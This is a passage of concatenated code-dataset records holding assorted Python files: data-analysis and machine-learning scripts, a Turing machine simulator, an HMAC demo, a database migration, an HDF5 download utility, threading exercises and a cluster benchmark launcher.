parcelas! 
Fim da execução.')\nelse:\n print('Aplicação encerrada.')\n","sub_path":"Mundo2/ex052.py","file_name":"ex052.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"247505208","text":"# encoding = utf8\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nmovie_data = pd.read_csv(\"./tmdb-movies.csv\")\n\nmovie_data = movie_data.dropna()\n\nsimple_data = movie_data[['id', 'popularity', 'budget', 'runtime', 'vote_average']]\n\n# print(movie_data.loc[list(range(20)) + list([47, 48])])\n# print('===========')\n# print(movie_data.loc[50:60, ['popularity']])\n# print('===========')\n# print(movie_data[movie_data['popularity'] > 5])\n# print('===========')\n# print(movie_data[(movie_data['popularity'] > 5) & (movie_data['release_year'] > 1996)])\n# print(movie_data.groupby('release_year').agg({\"revenue\": np.average}))\n# array = np.array(movie_data)\n# print(movie_data.groupby('director').agg({\"popularity\": np.average}).sort_values('popularity', ascending=False))\n\n\n# bin_edges = np.arange(0, pop_data['popularity'].max() + 1 / 4, 1 / 4)\n# plt.hist(data=pop_data, x='original_title', bins = bin_edges)\n#\n# # y_means = pd.to_datetime(df['indate']) - pd.to_datetime(df['dob'])\n#\n# y_means = movie_data['revenue'] - movie_data['budget']\n\n# #评分和票房高的电影的导演排行\n# top_votes =movie_data[movie_credit['vote_average'] >=8].sort_values(by = 'vote_average', ascending = False)\n# top_votes[top_votes.isnull()]\n# #删除空值\n# top_votes = top_votes[[ 'director', 'vote_average' , 'revenue']].dropna()\n# top_revenue = top_votes.sort_values(by = 'revenue', ascending = False)\n# top_revenue = top_revenue[[ 'revenue','director']]\n# top_revenue1 = top_revenue.groupby('director')['revenue'].mean().sort_values(ascending = True)\n#\n# # 图表可视化\n# plt.figure(figsize = (15,5))\n# plt.subplot(1,2,1)\n# ax1 =top_revenue1.tail(10).plot.barh(width=0.8,color = '#228B22')\n# plt.xticks(fontsize=13 ,rotation = 0)\n# plt.yticks(fontsize=13)movie_data['popularity'].max\n# plt.xlabel('票房',fontsize = 13)\n# plt.ylabel('导演', fontsize = 13)\n# plt.grid(True)\n# plt.title('高票房高评分导演排行榜', fontsize = 15)\nmovie_data['profit'] = movie_data['revenue'] - movie_data['budget']\nmovie_data.index = movie_data['release_year']\nnew_array = movie_data.groupby('release_year', as_index=True)['profit'].sem()\n\nprofit_data = pd.DataFrame(new_array)\nprofit_data.sort_values(by='release_year', ascending=True).plot(kind='barh')\n\nplt.title('各种电影类型的平均利润')\nplt.xlabel('平均利润(美元)')\nplt.ylabel('电影类型')\nplt.grid(True)\nplt.show()\n","sub_path":"P2_Explore_Movie_Dataset/learn.py","file_name":"learn.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"321394500","text":"import json\nimport pandas as pd \nimport string\n\nimport nltk\n\nfrom nltk.corpus import stopwords\n#nltk.download('stopwords')\n\nfrom nltk.stem import WordNetLemmatizer\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.ensemble import RandomForestClassifier\n\nfrom sklearn.metrics import confusion_matrix,accuracy_score\n\nreview_text = []\nreview_stars = []\nwith open('yelp_review_part1.json') as f:\n\tfor line in f:\n\t\tjson_line = 
json.loads(line)\n\t\treview_text.append(json_line[\"text\"])\n\t\treview_stars.append(json_line[\"stars\"])\n\ndataset = pd.DataFrame(data = {'text': review_text, 'stars': review_stars})#, columns=['text', 'stars'])\n\nprint(dataset.shape)\n\ndataset = dataset[0:3000]\n\nprint(dataset.shape)\n\ndataset = dataset[(dataset['stars']==1)|(dataset['stars']==3)|(dataset['stars']==5)]\n\nprint(dataset.shape)\n\ndata = dataset['text']\ntarget = dataset['stars']\n\nlemmatizer = WordNetLemmatizer()\n\ndef pre_processing(text):\n\ttext_processed = [char for char in text if char not in string.punctuation]\n\ttext_processed = ''.join(text_processed)\n\treturn [lemmatizer.lemmatize(word.lower()) for word in text_processed.split() if word.lower() not in stopwords.words('english')]\n\nprint(pre_processing(\"This is some text. Hello!!! This is pretending to be a review. Reviews are funny.\"))\n\ncount_vectorize_transformer = CountVectorizer(analyzer=pre_processing).fit(data)\n\nprint(count_vectorize_transformer.get_feature_names())\n\ndata = count_vectorize_transformer.transform(data)\n\ndata_training, data_test, target_training, target_test = train_test_split(data, target, test_size = 0.25)\n\nmachine = MultinomialNB()\n\nmachine.fit(data_training, target_training)\n\npredictions = machine.predict(data_test)\n\nprint(confusion_matrix(target_test, predictions))\nprint(accuracy_score(target_test, predictions))\n\n\ntest_review = \"It's a horrible resturant. It's expensive!!!!\"\ntest_review_transformed = count_vectorize_transformer.transform([test_review])\nprediction = machine.predict(test_review_transformed)\nprediction_prob = machine.predict_proba(test_review_transformed)\nprint(prediction)\nprint(prediction_prob)\n\ntest_review = \"Baby Shark Duh duh duh duh duh\"\ntest_review_transformed = count_vectorize_transformer.transform([test_review])\nprediction = machine.predict(test_review_transformed)\nprediction_prob = machine.predict_proba(test_review_transformed)\nprint(prediction)\nprint(prediction_prob)\n","sub_path":"train_yelp_review.py","file_name":"train_yelp_review.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"508122965","text":"def leArquivo():\r\n\twith open('entrada.txt', 'r') as file:\r\n\t\t#linha 1: (int) estados\r\n\t\testados = int(file.readline())\r\n\r\n\t\t#linha 2: (lista) terminais\r\n\t\tterminais = file.readline()\r\n\t\tterminais = terminais[2:]\r\n\t\tterminais = terminais.split()\r\n\r\n\t\t#linha 3: (lista) naoTerminais\r\n\t\tnaoTerminais = file.readline()\r\n\t\tnaoTerminais = naoTerminais[2:]\r\n\t\tnaoTerminais = naoTerminais.split()\r\n\r\n\t\t#linha 4: (int) aceitacao\r\n\t\taceitacao = int(file.readline())\r\n\r\n\r\n\t\t#linha 5: (int) numero de transicoes\r\n\t\tnumTransicoes = int(file.readline())\r\n\r\n\t\t#linha 6 a (numTransicoes + 6): (matriz de listas) definição das arestas do grafo que representa a maquina de turing\r\n\t\ttransicoes = []\r\n\t\tfor linha in range(numTransicoes):\r\n\t\t\ttemp = file.readline()\r\n\t\t\ttemp = temp.split()\r\n\t\t\ttransicoes.append(temp)\r\n\r\n\t\t#num cadeias a serem testadas: (int) numero de cadeias\r\n\t\tnumCadeias = int(file.readline())\r\n\r\n\t\t#cadeias a serem testadas: (lista) lista com as cadeias a serem testadas\r\n\t\tcadeias = []\r\n\t\tfor linha in range(numCadeias):\r\n\t\t\ttemp = file.readline()\r\n\t\t\tcadeias.append(temp.rstrip('\\n'))\r\n\t\r\n\t\treturn estados, terminais, naoTerminais, aceitacao, 
transicoes, cadeias\r\n\r\ndef printaCoisas(estados, terminais, naoTerminais, aceitacao, transicoes, cadeias):\r\n\r\n\tprint('estados = ')\r\n\tprint(str(estados))\r\n\tprint(' ')\r\n\r\n\tprint('terminais : ')\r\n\tprint(terminais)\r\n\tprint(' ')\r\n\r\n\tprint(\"não serminais (sigma'): \")\r\n\tprint(naoTerminais)\r\n\tprint(' ')\r\n\r\n\tprint('aceitacao = ')\r\n\tprint(str(aceitacao))\r\n\tprint(' ')\r\n\r\n\tprint('transicoes: ')\r\n\tprint(transicoes)\r\n\tprint(' ')\r\n\r\n\tprint('cadeias :')\r\n\tprint(cadeias)\r\n\tprint(' ')\r\n\r\ndef preparaGrafo(estados, transicoes):\r\n\tgraph = {}\r\n\tfor x in range(estados):\r\n\t\tgraph.setdefault(x,[])\r\n\r\n\tfor item in transicoes:\r\n\t\tkey = int(item[0])\r\n\t\ttempTransicoes = item[1:]\r\n\t\tgraph[key].append(tempTransicoes)\r\n\r\n\treturn graph\r\n\r\ndef testeCadeias(graph, posAtual, cadeia, estado):\r\n\r\n\tresultado = 0\r\n\tif estado == 5:\r\n\t\treturn 1\r\n\r\n\telse:\r\n\t\tfor lista in graph[estado]:\r\n\r\n\t\t\t#se existe instrucao para o que esta na cabeca de leitura:\r\n\t\t\tif(cadeia[posAtual] in lista): \r\n\t\t\t\tnewEstado = int(lista[1])\r\n\t\t\t\tescrever = lista[2]\r\n\t\t\t\tmovePara = lista[3]\r\n\t\t\telse:\r\n\t\t\t\tprint(\"não achou na lista\")\r\n\t\t\t\tcontinue\r\n\t\t\t\t\r\n\t\t\tnewCadeia = cadeia[:posAtual] + escrever + cadeia[posAtual+1:]\r\n\t\t\tif(movePara == 'R'):\r\n\t\t\t\tnewPosicao = posAtual + 1\r\n\t\t\telif(movePara == 'L'):\r\n\t\t\t\tnewPosicao = posAtual -1\r\n\t\t\telse:\r\n\t\t\t\tnewPosicao = posAtual\r\n\r\n\t\t\tprint(\"estado = \" + str(estado))\r\n\t\t\tprint('cadeia = ' + cadeia)\r\n\t\t\tprint('posicao atual = ' + str(posAtual))\r\n\t\t\tprint(\"move Para = \" + movePara)\r\n\t\t\tprint('nova cadeia = ' + newCadeia)\r\n\t\t\tprint('novo estado = ' + str(newEstado))\r\n\t\t\tprint('--------------')\r\n\r\n\r\n\t\t\tresultado = testeCadeias(graph, newPosicao, newCadeia, newEstado)\r\n\t\t\t\r\n\treturn resultado\r\n\r\nif __name__ == '__main__':\r\n\r\n\t# ----------------------- leitura e preparacao dos dados: ----------------\r\n\testados, terminais, naoTerminais, aceitacao, transicoes, cadeias = leArquivo()\r\n\r\n\t#printaCoisas(estados, terminais, naoTerminais, aceitacao, transicoes, cadeias)\r\n\r\n\tgraph = preparaGrafo(estados, transicoes)\r\n\r\n\t# ------------------------ começo do codigo em si ------------------------\r\n\testado = 0\r\n\tposAtual = 1\r\n\tnovaCadeia = ' ' + cadeias[0] + ' '\r\n\tresultado = testeCadeias(graph, posAtual, novaCadeia, estado)\r\n\t\"\"\"\r\n\tfor cadeia in cadeias:\r\n\t\tnovaCadeia = ' ' + cadeia + ' '\r\n\t\tresultado = testeCadeias(graph, posAtual, novaCadeia, estado)\r\n\t\tif resultado == 1:\r\n\t\t\tprint(\"DEU CERTO PORRA\")\r\n\t\"\"\"","sub_path":"itc/proBackup.py","file_name":"proBackup.py","file_ext":"py","file_size_in_byte":3551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"599573109","text":"#! 
/usr/bin/python3\n\nimport logging\nimport hmac\nimport hashlib\n\nlogging.basicConfig(level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\ndef main():\n # hmac_key = bytes([112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131])\n # hmac_key = bytes.fromhex(\"707172737475767778797a7b7c7d7e7f80818283\")\n hmac_key = bytes.fromhex(\"DBBE277096160FF4CDA921EFCAFCFFAD\")\n\n # text = bytes([72, 101, 108, 108, 111, 32, 87, 111, 114, 108, 100])\n text = b\"Hello World\\0\"\n log.debug(\"{}\".format(len(text)))\n\n digest = hashlib.sha1\n # digest = hashlib.md5\n\n hmac_obj = hmac.new(key=hmac_key, msg=None, digestmod=digest)\n for i in range(2):\n log.debug(f\"Hmac update:{i}\")\n hmac_obj.update(text)\n\n log.debug(\"Hmac key size:{}\".format(len(hmac_key)))\n log.debug(\"Hmac size:{}\".format(hmac_obj.digest_size))\n hmc_res = hmac_obj.digest()\n log.debug(\"Hmac:{} size:{}\".format(hmc_res.hex(), len(hmc_res)))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"py_hmac/py_hmac.py","file_name":"py_hmac.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"223326409","text":"from client import DAPIClient\nimport cbor2\n\nclient = DAPIClient()\n\n\ndef jsonrpc_tests():\n current_block_hash = client.getBestBlockHash()\n print('Test - getBestBlockHash: {}\\n'.format(current_block_hash))\n\n height = 0\n genesis_block_hash = client.getBlockHash(height)\n print('Test - getBlockHash (height: {}): {}\\n'.format(height, genesis_block_hash))\n\n mnlist_diff = client.getMnListDiff(genesis_block_hash, current_block_hash)\n print('Test - getMnListDiff:\\n{}\\n'.format(mnlist_diff))\n\n utxo = client.getUTXO('yPprxZrUL8UN73qLDS2xCg6yBFGieUWz7Q')#, 2)\n print('Test - getUTXO:\\n{}\\n'.format(utxo))\n\n address = 'yVs4HGmHgzP4t3gZ7KrpxRzCmkQcvZmczd'\n getAddressSummary = client.getAddressSummary(address)\n print('Test - getAddressSummary (address: {}): {}\\n' .format(address, getAddressSummary))\n return mnlist_diff\n\ndef jsonrpc_comm_test(mnlist_diff):\n print('Test - Check for JSON-RPC response from all masternodes')\n for mn in mnlist_diff['mnList']:\n ip = mn['service'].split(':')[0]\n try:\n response = client.make_request_to_node('getBestBlockHash', {}, ip)\n print('Successful response from {}: {}'.format(ip, response))\n except Exception as ex:\n print('*** Failure from {} ***'.format(ip))\n\n\ndef main():\n mnlist_diff = jsonrpc_tests()\n\n jsonrpc_comm_test(mnlist_diff)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"dapiclient/test-dapiclient.py","file_name":"test-dapiclient.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"130348154","text":"import numpy as np\nfrom tqdm import tqdm\n\ndef read_preds(train_date, start_epoch=0, finish_epoch=5, is_train=True):\n stage = ''\n if not is_train: stage = 'val_'\n train_preds_lst = []\n for i in tqdm_notebook(range(start_epoch, finish_epoch+1)):\n i_preds = np.genfromtxt(f'../data/result/{train_date}/preds/{stage}preds_{i}.csv', delimiter=',')\n train_preds_lst.append(i_preds)\n return train_preds_lst\n\n\ndef _get_target_cols():\n submission = pd.read_csv(os.path.join(DATA_DIR, 'sample_submission.csv'))\n target_columns = submission.columns.values[1:].tolist()\n return 
target_columns","sub_path":"lib/read_pandas.py","file_name":"read_pandas.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"618127627","text":"\"\"\"empty message\n\nRevision ID: 9f2abdd7a490\nRevises: bf6d916ec705\nCreate Date: 2018-06-25 12:33:02.465152\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '9f2abdd7a490'\ndown_revision = 'bf6d916ec705'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('leader_permission',\n sa.Column('id', mysql.BIGINT(unsigned=True), nullable=False),\n sa.Column('department_id', mysql.BIGINT(unsigned=True), nullable=False),\n sa.Column('permission_id', mysql.BIGINT(unsigned=True), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n mysql_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('idx_leader_permission_d', 'leader_permission', ['department_id'], unique=False)\n op.drop_table('employee_department')\n op.create_index('idx_department_permission_d', 'department_permission', ['department_id'], unique=False)\n op.drop_column('department_permission', 'leader_only')\n op.add_column('department_tree', sa.Column('department_id', mysql.BIGINT(unsigned=True), nullable=False))\n op.add_column('department_tree', sa.Column('depth', mysql.BIGINT(unsigned=True), nullable=False))\n op.add_column('department_tree', sa.Column('parent_id', mysql.BIGINT(unsigned=True), nullable=False))\n op.create_index('idx_department_tree_d', 'department_tree', ['department_id'], unique=False)\n op.create_index('idx_department_tree_p', 'department_tree', ['parent_id'], unique=False)\n op.drop_column('department_tree', 'parent_path')\n op.add_column('employee', sa.Column('department_id', mysql.BIGINT(unsigned=True), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('employee', 'department_id')\n op.add_column('department_tree', sa.Column('parent_path', mysql.VARCHAR(length=128), nullable=False))\n op.drop_index('idx_department_tree_p', table_name='department_tree')\n op.drop_index('idx_department_tree_d', table_name='department_tree')\n op.drop_column('department_tree', 'parent_id')\n op.drop_column('department_tree', 'depth')\n op.drop_column('department_tree', 'department_id')\n op.add_column('department_permission', sa.Column('leader_only', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False))\n op.drop_index('idx_department_permission_d', table_name='department_permission')\n op.create_table('employee_department',\n sa.Column('employee_id', mysql.BIGINT(display_width=20, unsigned=True), nullable=False),\n sa.Column('department_id', mysql.BIGINT(display_width=20, unsigned=True), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('employee_id'),\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.drop_index('idx_leader_permission_d', table_name='leader_permission')\n op.drop_table('leader_permission')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/9f2abdd7a490_.py","file_name":"9f2abdd7a490_.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"298076139","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pathlib import Path\nimport os\nimport sys\nimport glob\nimport json\nimport time\n\ndef set_working_dirs(json_dir_file, patient_num, patient_set):\n \"\"\"Loads in the dirs needed from json_dir_file. Retruns the paths objects.\"\"\"\n with open(json_dir_file) as f:\n paths_dict= json.loads(f.read())\n base_dir= Path(paths_dict['base_dir'])\n data_dir= Path(paths_dict['data_dir'])\n if patient_set == 'healthy':\n dir= Path(paths_dict['healthy_data_dir'])\n patient_data_dir= dir / patient_num\n elif patient_set == 'diabetes':\n dir= Path(paths_dict['diabetes_data_dir'])\n patient_data_dir= dir/ patient_num\n else:\n raise Exception('Patient_set must be either healthy or diabetes!')\n interim_data_dir= Path(paths_dict['interim_data_dir'])\n return(base_dir, data_dir, interim_data_dir, patient_data_dir)\n\ndef load_pat_data_into_df(patient_data_dir):\n \"\"\"Loads in the summary data from the sensors and returns dfs in a dict.\"\"\"\n data_glob= patient_data_dir.glob('**/*')\n files= [str(x).split('/')[-1] for x in data_glob if x.is_file()]\n raw_data_dict= {}\n for i, name in enumerate(files):\n raw_data_dict[i]= pd.read_csv(patient_data_dir/name)\n return raw_data_dict\n\ndef remove_unwanted_cols(df):\n \"\"\"Removes unwanted columns from the data and returns the cleaned df.\"\"\"\n df= df.drop(['BatteryVolts', 'BatteryLevel', 'SystemConfidence', 'ROGState', 'ROGTime',\n 'VerticalMin', 'VerticalPeak', 'LateralMin', 'LateralPeak', 'SagittalMin',\n 'SagittalPeak', 'DeviceTemp', 'StatusInfo', 'LinkQuality', 'RSSI', 'CoreTemp'\n , 'AuxADC1', 'AuxADC2', 'AuxADC3', 'SkinTemp', 'BRNoise', 'BRConfidence',\n 'ECGNoise', 'GSR', 'TxPower', 'HRV', 'HRConfidence'], axis=1)\n return df\n\ndef remove_null_HR_BR_entries(df, HR_col= 'HR', BR_col= 'BR'):\n \"\"\"Removes any measurements where HR or BR measured is zero,\n returns dataframe without these rows\"\"\"\n index_drop= df[df[HR_col] == 0].index\n df = df.drop(index_drop)\n index_drop_2= df[df[BR_col] == 0].index\n df = df.drop(index_drop_2)\n return df\n\ndef 
index_df_by_date(df, index_col= 'Time'):\n \"\"\"Converts the index to a datetime object and returns the\n reindexed dataset\"\"\"\n df[index_col] = pd.to_datetime(df[index_col])\n df= df.set_index(df[index_col]).drop([index_col], axis=1)\n return df\n\ndef drop_unwanted_cols_and_nulls(raw_data_dict):\n \"\"\"Drops columns not needed and and HR/BR zero values that are measurement\n issues. Returns the cleaned data as a dict of dfs.\"\"\"\n clean_data_dict= {}\n for i, data in raw_data_dict.items():\n clean_data= remove_unwanted_cols(data)\n clean_no_null= remove_null_HR_BR_entries(clean_data)\n clean_data_dict[i]= clean_no_null\n return clean_data_dict\n\ndef min_res_data_dropnas(clean_data_dict):\n \"\"\"Aggregates the data by minute resolution with mean and std then drops\n NaNs. Also deletes first and last 5mins recordings as data is messy\n (especially for ECG and BR aplitude). Returns the data as a dict of dfs.\"\"\"\n clean_min_data_dict= {}\n for i, data in clean_data_dict.items():\n data= index_df_by_date(data)\n sum_mean= data.resample('T').mean()\n sum_std= data.resample('T').std()\n sum_std.columns = [str(col) + '_std' for col in sum_std.columns]\n sum_data= pd.concat([sum_mean, sum_std], axis=1)\n sum_data= sum_data.dropna(axis=0)\n sum_data= sum_data.iloc[4:-5, :] #Removes first and last 5 mins recordings\n clean_min_data_dict[i]= sum_data\n return clean_min_data_dict\n\ndef pool_patient_data_into_df(clean_min_data_dict, patient_num, patient_set, interim_data_dir):\n \"\"\"Pool patient data from different recodings and make as a single df. Saves\n as csv in imterim data folder\"\"\"\n df= pd.DataFrame()\n for i, data in clean_min_data_dict.items():\n df= df.append(data)\n print('Data shape is {}'.format(df.shape))\n df.to_csv(interim_data_dir/'agg_data_{}_{}.csv'.format(patient_set, patient_num))\n return\n\nsubset= input('Which patient subset would you like to process (healthy or diabetes)? 
')\npatients=[]\npatients= input('Enter the file names for the patients to be processed as a list of strings seperated by a space ')\npat_list= list(patients.split(' '))\n\nfor i, val in enumerate(pat_list):\n start= time.time()\n base_dir, data_dir, interim_data_dir, patient_data_dir= set_working_dirs(\n '/home/darren/Documents/DS/projects/health_data/src/dir_file.json', patient_num= val, patient_set= subset)\n raw_data_dict= load_pat_data_into_df(patient_data_dir)\n clean_data_dict= drop_unwanted_cols_and_nulls(raw_data_dict)\n clean_min_data_dict= min_res_data_dropnas(clean_data_dict)\n pool_patient_data_into_df(clean_min_data_dict, patient_num= val, patient_set= subset, interim_data_dir= interim_data_dir)\n t_sec= round(time.time() - start)\n (t_min, t_sec)= divmod(t_sec, 60)\n print('File processing took: {}min:{}sec'.format(t_min, t_sec))\n\nprint('Processing finished!!')\n","sub_path":"src/agg_data_driver.py","file_name":"agg_data_driver.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"55968081","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/h5pyd/_apps/hsget.py\n# Compiled at: 2019-10-28 20:47:17\n# Size of source mod 2**32: 7446 bytes\nimport sys, logging\ntry:\n import h5py, h5pyd\nexcept ImportError as e:\n try:\n sys.stderr.write('ERROR : %s : install it to use this utility...\\n' % str(e))\n sys.exit(1)\n finally:\n e = None\n del e\n\nif __name__ == '__main__':\n from config import Config\n from utillib import load_file\nelse:\n from .config import Config\n from .utillib import load_file\ncfg = Config()\n\ndef usage():\n print('Usage:\\n')\n print(' {} [ OPTIONS ] domain filepath'.format(cfg['cmd']))\n print('')\n print('Description:')\n print(' Copy server domain to local HDF5 file')\n print(' domain: HDF Server domain (Unix or DNS style)')\n print(' filepath: HDF5 file to be created ')\n print('')\n print('Options:')\n print(' -v | --verbose :: verbose output')\n print(' -e | --endpoint :: The HDF Server endpoint, e.g. 
http://hsdshdflab.hdfgroup.org')\n print(' -u | --user :: User name credential')\n print(' -p | --password :: Password credential')\n print(' -c | --conf :: A credential and config file')\n print(' --cnf-eg :: Print a config file and then exit')\n print(' --logfile :: logfile path')\n print(' --loglevel debug|info|warning|error :: Change log level')\n print(' --bucket :: Storage bucket')\n print(' --nodata :: Do not download dataset data')\n print(\" -4 :: Force ipv4 for any file staging (doesn't set hsds loading net)\")\n print(' -6 :: Force ipv6 (see -4)')\n print(' -h | --help :: This message.')\n print('')\n\n\ndef print_config_example():\n print('# default')\n print('hs_username = ')\n print('hs_password = ')\n print('hs_endpoint = http://hsdshdflab.hdfgroup.org')\n\n\ndef main():\n loglevel = logging.ERROR\n verbose = False\n nodata = False\n cfg['cmd'] = sys.argv[0].split('/')[(-1)]\n if cfg['cmd'].endswith('.py'):\n cfg['cmd'] = 'python ' + cfg['cmd']\n cfg['verbose'] = False\n endpoint = cfg['hs_endpoint']\n username = cfg['hs_username']\n password = cfg['hs_password']\n bucket = cfg['hs_bucket']\n logfname = None\n ipvfam = None\n des_file = None\n src_domain = None\n argn = 1\n while argn < len(sys.argv):\n arg = sys.argv[argn]\n val = None\n if arg[0] == '-':\n if src_domain is not None:\n print('options must precead source files')\n usage()\n sys.exit(-1)\n if len(sys.argv) > argn + 1:\n val = sys.argv[(argn + 1)]\n if arg in ('-v', '--verbose'):\n verbose = True\n argn += 1\n elif arg == '--nodata':\n nodata = True\n argn += 1\n elif arg == '--loglevel':\n if val == 'debug':\n loglevel = logging.DEBUG\n else:\n if val == 'info':\n loglevel = logging.INFO\n else:\n if val == 'warning':\n loglevel = logging.WARNING\n else:\n if val == 'error':\n loglevel = logging.ERROR\n else:\n print('unknown loglevel')\n usage()\n sys.exit(-1)\n argn += 2\n elif arg == '--logfile':\n logfname = val\n argn += 2\n elif arg in ('-b', '--bucket'):\n bucket = val\n argn += 2\n elif arg == '-4':\n ipvfam = 4\n elif arg == '-6':\n ipvfam = 6\n elif arg in ('-h', '--help'):\n usage()\n sys.exit(0)\n elif arg in ('-e', '--endpoint'):\n endpoint = val\n argn += 2\n elif arg in ('-u', '--username'):\n username = val\n argn += 2\n elif arg in ('-p', '--password'):\n password = val\n argn += 2\n elif arg == '--cnf-eg':\n print_config_example()\n sys.exit(0)\n elif arg[0] == '-':\n usage()\n sys.exit(-1)\n elif src_domain is None:\n src_domain = arg\n argn += 1\n elif des_file is None:\n des_file = arg\n argn += 1\n else:\n usage()\n sys.exit(-1)\n\n logging.basicConfig(filename=logfname, format='%(asctime)s %(message)s', level=loglevel)\n logging.debug('set log_level to {}'.format(loglevel))\n logging.info('username: {}'.format(username))\n logging.info('password: {}'.format(password))\n logging.info('endpoint: {}'.format(endpoint))\n logging.info('verbose: {}'.format(verbose))\n if src_domain is None or des_file is None:\n usage()\n sys.exit(-1)\n logging.info('source domain: {}'.format(src_domain))\n logging.info('target file: {}'.format(des_file))\n if endpoint is None:\n logging.error('No endpoint given, try -h for help\\n')\n sys.exit(1)\n logging.info('endpoint: {}'.format(endpoint))\n try:\n fin = h5pyd.File(src_domain, mode='r', endpoint=endpoint, username=username, password=password, bucket=bucket, use_cache=True)\n except IOError as ioe:\n try:\n if ioe.errno == 403:\n logging.error('No read access to domain: {}'.format(src_domain))\n else:\n if ioe.errno == 404:\n logging.error('Domain: {} not 
found'.format(src_domain))\n else:\n if ioe.errno == 410:\n logging.error('Domain: {} has been recently deleted'.format(src_domain))\n else:\n logging.error('Error opening domain {}: {}'.format(src_domain, ioe))\n sys.exit(1)\n finally:\n ioe = None\n del ioe\n\n try:\n fout = h5py.File(des_file, 'w')\n except IOError as ioe:\n try:\n logging.error('Error creating file {}: {}'.format(des_file, ioe))\n sys.exit(1)\n finally:\n ioe = None\n del ioe\n\n try:\n load_file(fin, fout, verbose=verbose, nodata=nodata)\n msg = 'Domain {} downloaded to file: {}'.format(src_domain, des_file)\n logging.info(msg)\n if verbose:\n print(msg)\n except KeyboardInterrupt:\n logging.error('Aborted by user via keyboard interrupt.')\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/h5pyd-0.7.1-py3.7/hsget.cpython-37.py","file_name":"hsget.cpython-37.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139790452","text":"# Python 3.3.3 and 2.7.6\n# python helloworld_python.py\n\nfrom threading import Thread\nimport threading\n\nj = 0\nlock = threading.Lock()\n\ndef thread_1_function():\n global j\n for i in range(0,100001):\n lock.acquire()\n j+=1\n lock.release()\n\ndef thread_2_function():\n global j\n for i in range(-100000,0):\n lock.acquire()\n j-=1\n lock.release()\n\ndef main():\n thread_1 = Thread(target = thread_1_function, args = (),)\n thread_1.start()\n thread_2 = Thread(target = thread_2_function, args = (),)\n thread_2.start()\n\n thread_1.join()\n thread_2.join()\n print(j)\n\nmain()\n","sub_path":"exercises/ex02/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"317872517","text":"import sys\nimport time\nimport os\nimport threading\nimport time\nimport logging\nimport argparse\nimport subprocess\nsys.path.append('lib')\nfrom decoder import *\nfrom env_conf import *\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\nprefix = app_path\nbenchmark_prefix = work_load\nmaster_ip = get_master_ip()\nslaves_name = get_slaves_name()\n\ndef start_samp_slave(slave):\n os.system('ssh '+slave+' python3 '+prefix+'lib/samp_run.py')\n# 去掉异常生成器的调用\n# def start_anomaly_slave(slave,last,t,ip):\n# os.system('ssh '+slave+' python3 '+prefix+'anomaly_generator.py -t '+t+' -last '+str(last)+' -tnum '+str(res.tnum)+' ')\n\ndef start_iostat_local():\n os.system(\"python \"+prefix+\"/samp_run.py\")\n time.sleep(100)\n\n# def start_anomaly_local():\n# os.system(\"python \"+prefix+\"anomaly_generator.py -disable -ip \"+master_ip)\n# time.sleep(100)\n\ndef start_benchmark(cmd):\n ### luice modified\n '''\n 检查是否存在 spark 程序,如果存在,运行 spark 程序,否则运行 hadoop 程序\n '''\n # workload_path = benchmark_prefix+name\n # if os.path.exists(workload_path + '/spark'):\n # os.system(workload_path + '/spark/run.sh')\n # elif os.path.exists(workload_path + '/hadoop'):\n # os.system(workload_path + '/hadoop/run.sh')\n while True:\n try:\n print(cmd)\n 